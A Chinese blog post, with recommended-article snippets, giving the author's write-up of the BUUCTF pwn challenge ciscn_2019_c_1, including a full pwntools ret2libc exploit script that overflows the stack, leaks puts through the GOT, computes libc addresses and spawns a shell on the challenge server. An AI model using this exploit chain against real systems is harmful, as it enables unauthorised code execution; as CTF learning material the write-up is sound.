对buuctf的ciscn_2019_c_1wp的简单收获

最新推荐文章于 2023-05-29 23:36:53 发布
最新推荐文章于 2023-05-29 23:36:53 发布
阅读量757 收藏
点赞数
分类专栏: 二进制pwn学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Probeginner/article/details/121444851
版权

首先不得不说BUU里头用到LibcSearcher泄露libc非常离谱,反正还是用"libc = ELF(’./……’)"比"libc = LibcSearcher()"较合适…接下来谈谈这题的wp:
这里奇怪的是.recvuntil里头都带了个“\n”经过调试发现确实需要。然后就是"puts"遇到‘\x00’停止输出。

from pwn import*
from LibcSearcher import *

context.log_level='debug'

p=remote("node4.buuoj.cn",25324)
elf=ELF('./1')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
start_addr=elf.symbols['_start']
pop_rdi_addr=0x400c83

p.recvuntil('!\n')
p.sendline('1')
p.recvuntil('ed\n')

payload1='A'*88+p64(pop_rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(start_addr)
p.sendline(payload1)
p.recvuntil('Ciphertext\n')#意味着终端的输出是以换行符号“\n”结尾的
p.recvuntil("\n")
puts_addr = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00'))#"\x00"结尾意思是调用puts函数输出地址的时候遇到0结束输出;而且true是大写,这个.recvuntil(’\n’,drop=True)表示接受到换行符“\n”,并且舍弃此符号。



libc=ELF('./libc-2.27.so')#libc其实还有一种方式,下面有提到,不过我尝试了很多法子就是用不了,只能用这种了。
libcbase = puts_addr-libc.symbols['puts']
system_addr=libcbase+libc.symbols['system']
binsh_addr=libcbase+libc.search('/bin/sh').next()

p.recvuntil("!\n")
p.sendline('1')
p.recvuntil('ed\n')

ret_addr=0x4006b9
payload2='A'*88+p64(ret_addr)+p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr)
p.sendline(payload2)

p.interactive()

从调试里头的输出看:

从这个输出来看“\xb9这种字符”
这个"\xb9,\x06":“\xhh,指的是值为16进制数hh的字符”

其他的,就是这种题目的正常解法了,,,,,,

Hvf0x
关注
专栏目录
【BUU】ciscn_2019_c_1
bzduanlei的博客
07-30 269
一、解题思路 0x01 检查文件 开启了NX保护,堆栈不可执行。 0x02 将文件拖入IDA分析 分析主函数,发现get(s)函数存在栈溢出。 0x03 未寻找到system和‘/bin/sh’,需要通过puts函数泄露远端服务器中libc的基址,从而利用远端服务器libc中的system和字符串‘/bin/sh’的地址构造payload。 借助LibcSearcher工具,查找函数在内存中的真正地址。 LibcSearcher安装: git clone https://github.com/liean
ciscn_2019_en_3
fayinq的博客
03-14 478
ciscn_2019_en_3 首先写在前面的话,这道题找到关键点之后不能说十分简单,只能说非常的简单,但是这个题还是卡了我不久时间,最开始想了半天怎么泄露出libc地址,学过的方法全是不行,血压当场up。但是看了wp一眼之后就能秒杀了,当场高血压。 函数分析: Func_init(): Func_Execute(): 这其中本来是4个函数,但是show()和edit()函数没有东西,所以命名就省略了 Func_ADD(): Func_Free(): FREE的地方很明显,他
buuctf ciscn_2019_c_1 wp
n1ptune__的博客
05-02 398
记录下学习pwn的过程(感觉比re难多了,我太菜了) 查看保护 64位程序,64位程序 的前六个参数依次保存在 RDI, RSI, RDX, RCX, R8 和 R9,多的参数再通过栈传递 在encrypt函数里使用了gets函数,可能有栈溢出 发现对输入进行了加密 可以使用“\0”绕过 构造rop链,需要使用到rdi传递参数,又因为是ubuntu18所以需要栈对齐,使用到一个ret from pwn import * from LibcSearcher import * p=remote("node
ciscn_2019_c_1
qq_51687381的博客
05-25 380
第一次写到ret2libc,记个笔记加深印象。 F5反汇编main函数后,会让我们选择函数。我们注意到 encrypt函数中存在着gets(s) 栈溢出漏洞。 但是并没有存在system函数,所以我们不能直接利用。 所以我们要用ret2libc技术,先考虑泄露libc基地址。 在mian和encrypt函数中都出现了puts函数 我们知道根据延迟绑定技术: plt表中的函数如果没有被调用过,那么got表中该函数的对应项则指向plt表的第二行指令。当完成了第一次调用后,got表中会存放
[BUUCTF-pwn]——ciscn_2019_c_1
Y_peak的博客
02-07 1242
[BUUCTF-pwn]——ciscn_2019_c_1 题目地址:https://buuoj.cn/challenges#ciscn_2019_c_1 题目: 下载下来checksec一下 再IDA上面看一下,利用shift + f12看下字符串,发现没有我们想要的字符串。以为是ret2shellcode,结果弄了半天不可以。重新看一遍发现开启了NX保护,原来是ret2libc类型的,呜呜呜。 ...
BUUCTF-Pwn-ciscn_2019_c_1
餐桌上的猫
02-14 3642
题目截图 检查一下文件信息 开启了NX,64位的文件 使用IDA打开 按shift+F12查看字符串,没有找到“flag”和“/bin/sh”类似的字符串 一番寻找也没有找到system函数 查看函数导入表找到了puts函数和gets函数,说明使用了libc动态库,可以从这里入手 找到gets函数所在位置查看 在函数encrypt中使用了gets函数,存在栈溢出,点击encrypt函数的名称,按x检查交叉引用 双击进入查看调用函数 运行程序可以了解到,该程序的功能是对字符串进行加密和解密,这段代码
Buu CTF PWN ciscn_2019_c_1 WriteUp
m0sway的博客
03-03 573
Buu CTF PWNciscn_2019_c_1的WriteUp
4.13做题随记(axb_2019_heap, ciscn_2019_final_5)
eeeeeight的博客
04-14 188
4.13做题随记 Column: Apr 14, 2021 Tags: Pwn 相关文件链接 axb_2019_heap ciscn_2019_final_5 axb_2019_heap: 保护检查: 利用思路: banner()中存在明显的格式化字符串漏洞, 因此可以用来泄露栈地址, libc地址以及pie产生的偏移 get_input()中有单字节溢出, 可以修改下一个chunk的inuse位, 从而unlink 因此只要获得偏移后unlink到&note任意读写到malloc_hook, 写
BUUCTF-PWN roarctf_2019_realloc_magic(tcache attack,块重叠,劫持_IO_2_1_stdout_泄露libc)
weixin_44145820的博客
04-17 2008
目录题目分析漏洞利用Exp 题目分析 free没有限制,可以多次free 使用realloc进行内存分配,没有限制大小 realloc的几个特殊用法(摘自官方WP) size == 0 ,这个时候等同于free realloc_ptr == 0 && size > 0 , 这个时候等同于malloc malloc_usable_size(realloc_ptr) &g...
BUUCTF】roarctf_2019_realloc_magic---从一道题认识realloc函数+stdout泄露libc地址实战
Assassin
09-18 2131
realloc好题
ciscn_2019_c_11的wp
wuyvle的博客
02-01 597
看看代码主体 发现没有system函数 但有puts这个函数,就可以通过构造rop泄露出libc的版本和函数地址,利用LibcSearcher或者DynELF可以查到libc的版本,之后获取libc里面的地址构造ROP链,获取shell。 from pwn import * from LibcSearcher import * def encrypt(string): newstr = list(string) for i in range(len(newstr)): c
ciscn_2019_c_1 1
qq_41560595的博客
10-06 4412
payload构造 此题和之前总结的ret2libc题型相似,但是那个题是32位的,而此题是64位的。因此,payload的构造方式不一样。 payload1 此时的esp正处于函数返回的状态,即从上往下走。 在64位中,有rdi,rsi,rdx,rcx,r8,r9几个寄存器保存参数。当esp指向pop rdi ;ret时,rip指向puts_got,puts_got所保存的真实地址就能弹到rdi上。以上是准备参数。 再往下就是是固定格式“函数地址+返回地址+参数”的体现: 利用puts_plt作为函数地
BUUCTF刷题之路-ciscn_2019_c_11
最新发布
qq_30528603的博客
05-29 268
因为程序走到这时puts函数已经执行过了,got表里面填充的就是puts函数的真实地址,因此我们再次调用一次puts函数并把puts的got表的内容当做参数传给puts函数,所以程序会去puts_plt去执行puts函数,并把puts函数的真实地址打印出来。我们分析这里是做什么的,得到了puts_addr这个puts函数的真实地址,减去puts在libc的偏移得到Libc加载的真实基地址,然后利用基地址加上system函数的偏移得到system函数的真实地址。这是个64位的程序,没有开启金丝雀和PIE。
[CISCN2019 华东南赛区]Web11
m0_62905261的博客
09-01 286
[CISCN2019 华东南赛区]Web11
[CISCN 2019 初赛]Love Math
weixin_43940853的博客
02-19 2092
<?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { ...
BUUCTF ciscn_2019_c_1
、moddemod
06-01 1277
跑一下程序,大致流程是 到现在程序就基本分析完成,接下来需要构造rop泄露libc地址然后利用system等函数获得shell 我们首先要获得libc的基地址,可以通过puts函数入手,这里解释一下为什么通过puts函数而不通过其他函数,因为puts函数在我们进入encrypt函数之前已经调用了很多次了,对于每一个动态链接而言,第一次调用完成以后,就修正了.got表中的对应的puts函数的地址,所以我们可以通过puts函数泄露。 from pwn import * from LibcSearc.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值